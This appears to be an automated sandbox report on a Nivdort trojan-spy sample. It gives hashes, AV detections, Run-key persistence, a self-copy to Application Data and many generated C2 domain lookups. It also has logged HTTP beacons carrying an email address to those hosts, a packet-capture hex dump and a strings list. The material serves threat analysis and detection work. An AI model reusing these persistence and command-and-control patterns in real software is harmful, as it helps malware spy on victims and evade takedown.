Analysis Date | 2014-01-18 11:22:43 |
---|---|
MD5 | 0711e02cec3da34b30527b5fca8ea37a |
SHA1 | e8261968968fc6e25ffc36526d55c49de808c029 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 6e28fb3f7f7024b20c945b2655b1da7f sha1: 3f4ab902ae62fef9d21228b7125dd47f11001325 size: 132608 | |
Section | .rdata md5: caf784316d92de14dbb2176369ed297c sha1: f751fc494782f9f3944000fbe6c12c70ae01080f size: 19968 | |
Section | .data md5: 1e16197f4ff8a44711125ca8bd653d9d sha1: 7e4ce89b4eb3ee63e6d2dcef40b1d61c9d10263b size: 16896 | |
Timestamp | 2013-06-20 16:34:07 | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | a97c5ffa48c3ddaa059691e2e2a4fe99d34a8636 | |
AV | msse | TrojanSpy:Win32/Nivdort.O |
AV | avg | Agent4.BNEC |
AV | avira | TR/Spy.Nivdort.O.19 |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Store Virtual Engine Connectivity ➝ C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe |
---|---|
Creates File | C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe
Creates File | C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\vvellxwibwcj.exe |
---|---|
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.wnmvp |
Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe" |
Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\bxihufyxbewhyfv\xrdvfzftjoim.exe"
Network Details:
DNS | summertraining.net Type: A 108.175.146.162 |
---|---|
DNS | summerstorm.net Type: A 184.168.221.96 |
DNS | crowdstorm.net Type: A 184.168.221.41 |
DNS | watertraining.net Type: A 216.21.239.197 |
DNS | thoughtstorm.net Type: A 192.232.218.155 |
DNS | womantraining.net Type: A 64.124.15.253 |
DNS | fighthunger.net Type: A 82.98.86.162 |
DNS | fighttraining.net Type: A 176.74.176.179 |
DNS | wateralthough.net Type: A 98.139.135.198 |
DNS | knownhunger.net Type: A |
DNS | begintraining.net Type: A |
DNS | knowntraining.net Type: A |
DNS | beginstorm.net Type: A |
DNS | knownstorm.net Type: A |
DNS | beginthrown.net Type: A |
DNS | knownthrown.net Type: A |
DNS | summerhunger.net Type: A |
DNS | crowdhunger.net Type: A |
DNS | crowdtraining.net Type: A |
DNS | summerthrown.net Type: A |
DNS | crowdthrown.net Type: A |
DNS | thoughthunger.net Type: A |
DNS | waterhunger.net Type: A |
DNS | thoughttraining.net Type: A |
DNS | waterstorm.net Type: A |
DNS | thoughtthrown.net Type: A |
DNS | waterthrown.net Type: A |
DNS | womanhunger.net Type: A |
DNS | smokehunger.net Type: A |
DNS | smoketraining.net Type: A |
DNS | womanstorm.net Type: A |
DNS | smokestorm.net Type: A |
DNS | womanthrown.net Type: A |
DNS | smokethrown.net Type: A |
DNS | partyhunger.net Type: A |
DNS | partytraining.net Type: A |
DNS | partystorm.net Type: A |
DNS | fightstorm.net Type: A |
DNS | partythrown.net Type: A |
DNS | fightthrown.net Type: A |
DNS | freshchoose.net Type: A |
DNS | experiencechoose.net Type: A |
DNS | freshalthough.net Type: A |
DNS | experiencealthough.net Type: A |
DNS | freshperiod.net Type: A |
DNS | experienceperiod.net Type: A |
DNS | freshhowever.net Type: A |
DNS | experiencehowever.net Type: A |
DNS | gentlemanchoose.net Type: A |
DNS | alreadychoose.net Type: A |
DNS | gentlemanalthough.net Type: A |
DNS | alreadyalthough.net Type: A |
DNS | gentlemanperiod.net Type: A |
DNS | alreadyperiod.net Type: A |
DNS | gentlemanhowever.net Type: A |
DNS | alreadyhowever.net Type: A |
DNS | followchoose.net Type: A |
DNS | memberchoose.net Type: A |
DNS | followalthough.net Type: A |
DNS | memberalthough.net Type: A |
DNS | followperiod.net Type: A |
DNS | memberperiod.net Type: A |
DNS | followhowever.net Type: A |
DNS | memberhowever.net Type: A |
DNS | beginchoose.net Type: A |
DNS | knownchoose.net Type: A |
DNS | beginalthough.net Type: A |
DNS | knownalthough.net Type: A |
DNS | beginperiod.net Type: A |
DNS | knownperiod.net Type: A |
DNS | beginhowever.net Type: A |
DNS | knownhowever.net Type: A |
DNS | summerchoose.net Type: A |
DNS | crowdchoose.net Type: A |
DNS | summeralthough.net Type: A |
DNS | crowdalthough.net Type: A |
DNS | summerperiod.net Type: A |
DNS | crowdperiod.net Type: A |
DNS | summerhowever.net Type: A |
DNS | crowdhowever.net Type: A |
DNS | thoughtchoose.net Type: A |
DNS | waterchoose.net Type: A |
DNS | thoughtalthough.net Type: A |
DNS | thoughtperiod.net Type: A |
DNS | waterperiod.net Type: A |
HTTP GET | http://summertraining.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
HTTP GET | http://summerstorm.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
HTTP GET | http://crowdstorm.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
HTTP GET | http://watertraining.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
HTTP GET | http://thoughtstorm.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
HTTP GET | http://womantraining.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
HTTP GET | http://fighthunger.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
HTTP GET | http://fighttraining.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
HTTP GET | http://wateralthough.net/forum/search.php?email=twingirlz87@yahoo.com&method=post User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 108.175.146.162:80 |
Flows TCP | 192.168.1.1:1032 ➝ 184.168.221.96:80 |
Flows TCP | 192.168.1.1:1033 ➝ 184.168.221.41:80 |
Flows TCP | 192.168.1.1:1034 ➝ 216.21.239.197:80 |
Flows TCP | 192.168.1.1:1035 ➝ 192.232.218.155:80 |
Flows TCP | 192.168.1.1:1036 ➝ 64.124.15.253:80 |
Flows TCP | 192.168.1.1:1037 ➝ 82.98.86.162:80 |
Flows TCP | 192.168.1.1:1038 ➝ 176.74.176.179:80 |
Flows TCP | 192.168.1.1:1039 ➝ 98.139.135.198:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207375 close..Host: su 0x00000070 (00112) 6d6d6572 74726169 6e696e67 2e6e6574 mmertraining.net 0x00000080 (00128) 0d0a0d0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207375 close..Host: su 0x00000070 (00112) 6d6d6572 73746f72 6d2e6e65 740d0a0d mmerstorm.net... 0x00000080 (00128) 0a0a0d0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206372 close..Host: cr 0x00000070 (00112) 6f776473 746f726d 2e6e6574 0d0a0d0a owdstorm.net.... 0x00000080 (00128) 0a0a0d0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207761 close..Host: wa 0x00000070 (00112) 74657274 7261696e 696e672e 6e65740d tertraining.net. 0x00000080 (00128) 0a0d0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207468 close..Host: th 0x00000070 (00112) 6f756768 7473746f 726d2e6e 65740d0a oughtstorm.net.. 0x00000080 (00128) 0d0a0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a20776f close..Host: wo 0x00000070 (00112) 6d616e74 7261696e 696e672e 6e65740d mantraining.net. 0x00000080 (00128) 0a0d0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206669 close..Host: fi 0x00000070 (00112) 67687468 756e6765 722e6e65 740d0a0d ghthunger.net... 0x00000080 (00128) 0a0d0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a206669 close..Host: fi 0x00000070 (00112) 67687474 7261696e 696e672e 6e65740d ghttraining.net. 0x00000080 (00128) 0a0d0a0a .... 0x00000000 (00000) 47455420 2f666f72 756d2f73 65617263 GET /forum/searc 0x00000010 (00016) 682e7068 703f656d 61696c3d 7477696e h.php?email=twin 0x00000020 (00032) 6769726c 7a383740 7961686f 6f2e636f girlz87@yahoo.co 0x00000030 (00048) 6d266d65 74686f64 3d706f73 74204854 m&method=post HT 0x00000040 (00064) 54502f31 2e300d0a 41636365 70743a20 TP/1.0..Accept: 0x00000050 (00080) 2a2f2a0d 0a436f6e 6e656374 696f6e3a */*..Connection: 0x00000060 (00096) 20636c6f 73650d0a 486f7374 3a207761 close..Host: wa 0x00000070 (00112) 74657261 6c74686f 7567682e 6e65740d teralthough.net. 0x00000080 (00128) 0a0d0a0a ....
Strings
Bjjj H ((((( H h(((( H jjjh jjjjj KERNEL32.DLL mscoree.dll (null) !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ 0A@@Ju 0SSSSS 0WWWWW 1#QNAN 1#SNAN 3NV]b\D 4h"YhN /6tmA.: 8VVVVV abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ AbortPath AccessCheckByType AccessCheckByTypeResultList AddAccessAllowedAce AddAccessAllowedAceEx AdjustTokenPrivileges ADVAPI32.dll AllocateAndInitializeSid AllocateLocallyUniqueId An application has made an attempt to load the C runtime library incorrectly. AnimatePalette AreAllAccessesGranted <at9<rt,<wt - Attempt to initialize the CRT more than once. - Attempt to use MSIL code from this assembly during native code initialization August .?AVbad_alloc@std@@ .?AVbad_exception@std@@ .?AVexception@std@@ .?AVlength_error@std@@ .?AVlogic_error@std@@ .?AVout_of_range@std@@ .?AVtype_info@@ BackupEventLogA bad allocation bad exception Base Class Array' Base Class Descriptor at ( __based( BeginPaint BeginPath CallMsgFilterA __cdecl CF@SeD ChangeTimerQueueTimer CharLowerBuffA CheckMenuItem Class Hierarchy Descriptor' CloseHandle __clrcall \CLr.hG9 @C=mh`P CommConfigDialogA CompareStringA CompareStringW Complete Object Locator' CONOUT$ ConvertThreadToFiber ConvertToAutoInheritPrivateObjectSecurity `copy constructor closure' CopyFileA CorExitProcess CreateCaret CreateCompatibleDC CreateDirectoryA CreateDiscardableBitmap CreateEventA CreateFileA CreateFileMappingA CreateFontA CreateIconFromResource CreateIconFromResourceEx CreateMailslotA CreateMutexA CreatePalette CreatePrivateObjectSecurityWithMultipleInheritance CreateProcessA CreateRectRgn CreateRemoteThread CreateStreamOnHGlobal CreateThread CreateTimerQueueTimer CreateToolhelp32Snapshot CreateWaitableTimerA CreateWindowExA - CRT not initialized @.data dddd, MMMM dd, yyyy DebugActiveProcess December DecodePointer `default constructor closure' DefWindowProcA delete delete[] Delete DeleteColorSpace DeleteCriticalSection DeleteEnhMetaFile DeleteFiber DeleteVolumeMountPointA DestroyAcceleratorTable DestroyIcon DisconnectNamedPipe DispatchMessageA dm$#2 DOMAIN error DPtoLP DrawIcon DrawTextExA drr_29 `dynamic atexit destructor for ' `dynamic initializer for ' @E5f GM\F `eh vector constructor iterator' `eh vector copy constructor iterator' `eh vector destructor iterator' `eh vector vbase constructor iterator' `eh vector vbase copy constructor iterator' EncodePointer EndPaint EnterCriticalSection EnumClipboardFormats EqualRect ExitProcess ExitWindowsEx ExtTextOutA f1X=0dy __fastcall February F\h%$. FileTimeToLocalFileTime FileTimeToSystemTime FindClose FindFirstFileA FindFirstVolumeA FindResourceExA FindWindowExA - floating point support not loaded FlsAlloc FlsFree FlsGetValue FlsSetValue FlushFileBuffers ForceRemove FreeEnvironmentStringsA FreeEnvironmentStringsW FreeUserPhysicalPages Friday ^F<-uB FVh(0B F\=x.B GAIsProcessorFeaturePresent GDI32.dll GdiFlush GetAce GetACP GetActiveWindow GetCapture GetCaretPos GetCharacterPlacementA GetCharWidth32A GetCharWidthI GetClipRgn GetColorSpace GetComboBoxInfo GetCommandLineA GetCommModemStatus GetConsoleCP GetConsoleMode GetConsoleOutputCP GetCPInfo GetCurrentDirectoryA GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetDesktopWindow GetDeviceCaps GetDeviceGammaRamp GetDialogBaseUnits GetDiskFreeSpaceA GetDiskFreeSpaceExA GetDlgItemTextA GetDriveTypeA GetEnhMetaFileA GetEnhMetaFileDescriptionA GetEnvironmentStrings GetEnvironmentStringsW GetEnvironmentVariableA GetExitCodeThread GetFileAttributesA GetFileSize GetFileSizeEx GetFileTime GetFileType GetFullPathNameA GetGlyphIndicesA GetIconInfo GetKernelObjectSecurity GetKerningPairsA GetLastActivePopup GetLastError GetLocaleInfoA GetMapMode GetMenuCheckMarkDimensions GetMenuItemRect GetMessageA GetMessageTime GetModuleFileNameA GetModuleHandleA GetModuleHandleW GetMonitorInfoA GetNumaHighestNodeNumber GetNumaProcessorNode GetOEMCP GetPolyFillMode GetPrivateProfileIntA GetPrivateProfileSectionA GetProcAddress GetProcessHeap GetProcessIoCounters GetProcessPriorityBoost GetProcessShutdownParameters GetProcessVersion GetProcessWindowStation GetProcessWorkingSetSize GetProfileSectionA GetStartupInfoA GetStdHandle GetStockObject GetStringTypeA GetStringTypeW GetSystemTimeAsFileTime GetTempFileNameA GetTempPathA GetTextColor GetThreadContext GetTickCount GetTimeZoneInformation GetTitleBarInfo GetUserObjectInformationA GetUserObjectSecurity GetVolumeNameForVolumeMountPointA GetVolumePathNamesForVolumeNameA GetWindowDC GetWindowPlacement GetWindowRect GetWindowTextA GetWindowTextLengthA GetWindowThreadProcessId GetWriteWatch GlobalAlloc GlobalCompact GlobalFree GlobalGetAtomNameA GlobalLock GlobalMemoryStatusEx GlobalUnfix GlobalUnlock gNl0&DyXBVc GWh(0B `h```` HeapAlloc HeapCreate HeapFree HeapReAlloc HeapSize HeapWalk `h`hhh HH:mm:ss HHtXHHt >If90t InitializeCriticalSectionAndSpinCount InitializeSListHead InSendMessageEx InterlockedDecrement InterlockedIncrement InterlockedPopEntrySList IntersectClipRect InvalidateRect InvalidateRgn invalid string position IsBadWritePtr IsCharUpperA IsClipboardFormatAvailable IsDebuggerPresent IsDialogMessageA IsDlgButtonChecked IsProcessorFeaturePresent IsTextUnicode IsValidCodePage IsWindow IsWindowEnabled IsZoomed JanFebMarAprMayJunJulAugSepOctNovDec January j,hpLB j@j ^V j"^SSSSS jTh8HB ;JW-iJ KERNEL32 KERNEL32.dll k=HoZ. LCMapStringA LCMapStringW lDAg+ X LeaveCriticalSection LoadCursorA LoadCursorFromFileA LoadKeyboardLayoutA LoadLibraryA LoadResource LocalLock LocalShrink `local static guard' `local static thread guard' `local vftable' `local vftable constructor closure' LookupPrivilegeNameA LPtoDP `managed vector constructor iterator' `managed vector copy constructor iterator' `managed vector destructor iterator' MapViewOfFileEx MessageBoxA Microsoft Visual C++ Runtime Library MM/dd/yy ModifyWorldTransform Monday MoveFileA MoveFileWithProgressA MoveWindow '-M'+U MulDiv MultiByteToWideChar MxmMRHf new[] NoRemove - not enough space for arguments - not enough space for environment - not enough space for locale information - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November (null) Nwue b ObjectOpenAuditAlarmA )+obz< October OemKeyScan OffsetClipRgn ole32.dll OLEAUT32.dll `omni callsig' OpenProcess OpenThread OpenThreadToken operator __pascal PeekMessageA PeekNamedPipe `placement delete closure' `placement delete[] closure' Please contact the application's support team for more information. PolyDraw PolyPolyline PolyTextOutA PostQueuedCompletionStatus PostQuitMessage PPPPPPPP Process32First Process32Next Program: <program name unknown> __ptr64 - pure virtual function call QQSVWd QueryPerformanceCounter RaiseException rB13K0 `.rdata ReadEventLogA ReadFile ReadFileEx ReadProcessMemory RegCloseKey RegisterClassExA RegisterDeviceNotificationA RegisterHotKey RegOpenKeyA RegSetValueExA RemoveFontResourceA RemovePropA ReplaceFileA __restrict ResumeThread RtlUnwind runtime error Runtime Error! Saturday `scalar deleting destructor' ScrollDC ScrollWindowEx SendInput September SetBkMode SetCaretBlinkTime SetClassLongA SetClipboardData SetComputerNameA SetCursorPos SetDlgItemInt SetEndOfFile SetEnvironmentVariableA SetEvent SetFileAttributesA SetFilePointer SetFirmwareEnvironmentVariableA SetFocus SetForegroundWindow SetHandleCount SetLastError SetMapMode SetMenu SetMenuInfo SetMenuItemInfoA SetMessageQueue SetMessageWaitingIndicator SetMiterLimit SetPolyFillMode SetProcessAffinityMask SetProcessDefaultLayout SetRect SetRectRgn SetSecurityDescriptorControl SetSecurityDescriptorGroup SetStdHandle SetStretchBltMode SetSystemCursor SetThreadPriorityBoost SetUnhandledExceptionFilter SetWindowTextA SetWinMetaFileBits ShowCaret ShowScrollBar ShowWindow SING error s[S;7|G;w ^SSSSS __stdcall `string' string too long Sunday SunMonTueWedThuFriSat t3hd.B TerminateProcess tGhl.B tGHt.Ht& t h4.B t"h\.B +t HHt This application has requested the Runtime to terminate it in an unusual way. __thiscall This indicates a bug in your application. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. !This program cannot be run in DOS mode. Thursday T(K36HsGZH < tK< tG TLOSS error TlsAlloc TlsFree TlsGetValue TlsSetValue <\tM</tI tR99u2 TranslateMessage TR(h*R TryEnterCriticalSection t"SS9] <+t(<-t$: t$<"u 3 Tuesday ;t$,v- t+WWVPV Type Descriptor' `typeof' u\.7t' >:u8FV `udt returning' ujj4h| - unable to initialize heap - unable to open console device __unaligned - unexpected heap error - unexpected multithread lock error UnhandledExceptionFilter UnhookWindowsHook UNICODE UnionRect Unknown exception UnregisterWait UpdateColors UpdateResourceA UpdateWindow UQPXY]Y[ URPQQh USER32.dll USER32.DLL u[SSSP UTF-16LE `vbase destructor' `vbtable' `vcall' `vector constructor iterator' `vector copy constructor iterator' `vector deleting destructor' `vector destructor iterator' `vector vbase constructor iterator' `vector vbase copy constructor iterator' V-faT0 `vftable' VirtualAlloc VirtualAllocEx `virtual displacement map' VirtualFree VirtualQuery v N+D$ _VVVVV VVVVVQRSSj WaitForInputIdle WaitForSingleObject WaitMessage Wednesday WideCharToMultiByte WinHelpA WriteConsoleA WriteConsoleW WriteFile WritePrivateProfileStructA WriteProfileStringA WS2_32.dll ^WWWWW xppwpp xpxxxx <xtX<XtT >=Yt1j YYhD.B